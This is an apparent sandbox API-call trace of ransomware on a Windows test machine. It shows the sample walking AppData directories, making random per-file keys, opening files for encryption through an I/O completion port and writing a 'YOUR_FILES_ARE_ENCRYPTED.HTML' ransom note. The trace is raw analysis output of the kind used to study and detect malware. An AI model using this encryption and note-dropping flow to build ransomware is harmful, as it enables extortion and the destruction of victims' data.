1 [0159.083] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xd26fc530, ftCreationTime.dwHighDateTime=0x1d70517, 
ftLastAccessTime.dwLowDateTime=0xd26fc530, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd26fc530, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0159.083] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Application Data") returned 54 [0159.083] GetProcessHeap () returned 0x270000 [0159.083] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0159.084] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Application Data" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Application Data") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Application Data" [0159.084] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Application Data", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Application Data\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Application Data\\*" [0159.084] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Application Data\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x75e0048, ftCreationTime.dwLowDateTime=0x74ea160, ftCreationTime.dwHighDateTime=0x75aba344, ftLastAccessTime.dwLowDateTime=0x18, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4ebd8a8, ftLastWriteTime.dwHighDateTime=0x40, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="", cAlternateFileName="Hݞ")) returned 0xffffffff [0159.097] GetProcessHeap () returned 0x270000 [0159.098] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0159.098] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: 
lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xd26fc530, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd26fc530, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd26fc530, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="History", cAlternateFileName="")) returned 1 [0159.098] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\History") returned 45 [0159.098] GetProcessHeap () returned 0x270000 [0159.098] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0159.098] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\History" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\History") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\History" [0159.098] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\History", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\History\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\History\\*" [0159.098] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\History\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x75e0048, ftCreationTime.dwLowDateTime=0x74ea160, ftCreationTime.dwHighDateTime=0x75aba344, ftLastAccessTime.dwLowDateTime=0x18, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4ebd8a8, ftLastWriteTime.dwHighDateTime=0x40, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="", cAlternateFileName="Hݞ")) returned 0xffffffff [0159.098] GetProcessHeap () returned 0x270000 [0159.099] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0159.099] FindNextFileW (in: 
hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xd2617cf0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2617cf0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xaeaad4a0, ftLastWriteTime.dwHighDateTime=0x1d7e775, nFileSizeHigh=0x0, nFileSizeLow=0xbf12e, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="IconCache.db", cAlternateFileName="ICONCA~1.DB")) returned 1 [0159.099] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\IconCache.db") returned 50 [0159.099] lstrcmpW (lpString1="IconCache.db", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.099] PathFindExtensionW (pszPath="IconCache.db") returned=".db" [0159.099] lstrlenW (lpString=".db") returned 3 [0159.099] PathFindExtensionW (pszPath="IconCache.db") returned=".db" [0159.099] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0159.099] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\iconcache.db"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0159.100] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=782638) returned 1 [0159.100] GetProcessHeap () returned 0x270000 [0159.100] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0159.102] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="BC") returned 2 [0159.102] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="5A") returned 2 [0159.102] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="1C") returned 2 [0159.102] wsprintfW (in: param_1=0x4ebda42, 
param_2="%02X" | out: param_1="0E") returned 2 [0159.102] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="9C") returned 2 [0159.102] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="EA") returned 2 [0159.102] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="03") returned 2 [0159.102] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="23") returned 2 [0159.102] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="89") returned 2 [0159.103] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="35") returned 2 [0159.103] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="7E") returned 2 [0159.103] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="C4") returned 2 [0159.103] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="83") returned 2 [0159.103] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="4B") returned 2 [0159.103] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="81") returned 2 [0159.103] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="47") returned 2 [0159.103] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="76") returned 2 [0159.103] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="F2") returned 2 [0159.103] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="FE") returned 2 [0159.103] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="09") returned 2 [0159.103] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="9E") returned 2 [0159.103] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="26") returned 2 [0159.103] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="5E") returned 2 [0159.103] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="9B") returned 2 [0159.103] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="6D") returned 2 [0159.103] wsprintfW 
(in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="DE") returned 2 [0159.103] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="59") returned 2 [0159.103] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="17") returned 2 [0159.103] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="13") returned 2 [0159.103] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="1B") returned 2 [0159.103] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="48") returned 2 [0159.103] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="01") returned 2 [0159.104] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\IconCache.db" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\IconCache.db") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\IconCache.db" [0159.104] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0159.104] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0159.104] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xf4484640, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf4484640, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0159.104] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft") returned 47 [0159.104] GetProcessHeap () returned 0x270000 [0159.104] RtlAllocateHeap (HeapHandle=0x270000, 
Flags=0x8, Size=0x10000) returned 0x74081a0 [0159.105] lstrcpyW (in: lpString1=0x74081a0, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft" [0159.105] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\*" [0159.105] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xf4484640, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf4484640, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0159.105] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xf4484640, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf4484640, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0159.105] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23dc850, ftLastAccessTime.dwHighDateTime=0x1d70517, 
ftLastWriteTime.dwLowDateTime=0x7bf6e58d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0159.105] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Credentials") returned 59 [0159.105] GetProcessHeap () returned 0x270000 [0159.105] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0159.105] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Credentials" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Credentials") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Credentials" [0159.105] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Credentials", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Credentials\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Credentials\\*" [0159.105] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Credentials\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23dc850, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7bf6e58d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0159.107] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23dc850, 
ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7bf6e58d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.107] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23dc850, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7bf6e58d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0159.107] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0159.107] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Credentials\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 89 [0159.107] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Credentials\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\credentials\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0159.108] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0159.110] CloseHandle (hObject=0x4a8) returned 1 [0159.110] GetProcessHeap () returned 0x270000 [0159.111] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0159.111] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: 
lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2617cf0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8acdf9c3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="Feeds", cAlternateFileName="")) returned 1 [0159.111] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds") returned 53 [0159.111] GetProcessHeap () returned 0x270000 [0159.111] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0159.112] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds" [0159.112] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\*" [0159.112] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2617cf0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8acdf9c3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0159.112] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: 
lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2617cf0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8acdf9c3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.112] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd2617cf0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2617cf0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ad77f44, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x1a00, dwReserved0=0x0, dwReserved1=0x60, cFileName="FeedsStore.feedsdb-ms", cAlternateFileName="FEEDSS~1.FEE")) returned 1 [0159.112] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms") returned 75 [0159.112] lstrcmpW (lpString1="FeedsStore.feedsdb-ms", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.112] PathFindExtensionW (pszPath="FeedsStore.feedsdb-ms") returned=".feedsdb-ms" [0159.112] lstrlenW (lpString=".feedsdb-ms") returned 11 [0159.112] PathFindExtensionW (pszPath="FeedsStore.feedsdb-ms") returned=".feedsdb-ms" [0159.112] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2617cf0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ab88d60, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Microsoft Feeds~", 
cAlternateFileName="MICROS~1")) returned 1 [0159.112] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~") returned 70 [0159.112] GetProcessHeap () returned 0x270000 [0159.112] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7422068 [0159.116] lstrcpyW (in: lpString1=0x7422068, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~" [0159.116] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\*" [0159.116] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2617cf0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ab88d60, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0159.121] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2617cf0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ab88d60, 
ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.122] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd2617cf0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2617cf0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a9bfcdd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0x0, dwReserved1=0x60, cFileName="Microsoft at Home~.feed-ms", cAlternateFileName="MICROS~2.FEE")) returned 1 [0159.122] wnsprintfW (in: pszDest=0x7422068, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms") returned 97 [0159.122] lstrcmpW (lpString1="Microsoft at Home~.feed-ms", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.122] PathFindExtensionW (pszPath="Microsoft at Home~.feed-ms") returned=".feed-ms" [0159.122] lstrlenW (lpString=".feed-ms") returned 8 [0159.122] PathFindExtensionW (pszPath="Microsoft at Home~.feed-ms") returned=".feed-ms" [0159.122] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25f1b90, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ab3caa0, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0x0, dwReserved1=0x60, cFileName="Microsoft at Work~.feed-ms", cAlternateFileName="MICROS~1.FEE")) returned 1 [0159.122] wnsprintfW (in: pszDest=0x7422068, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\Microsoft 
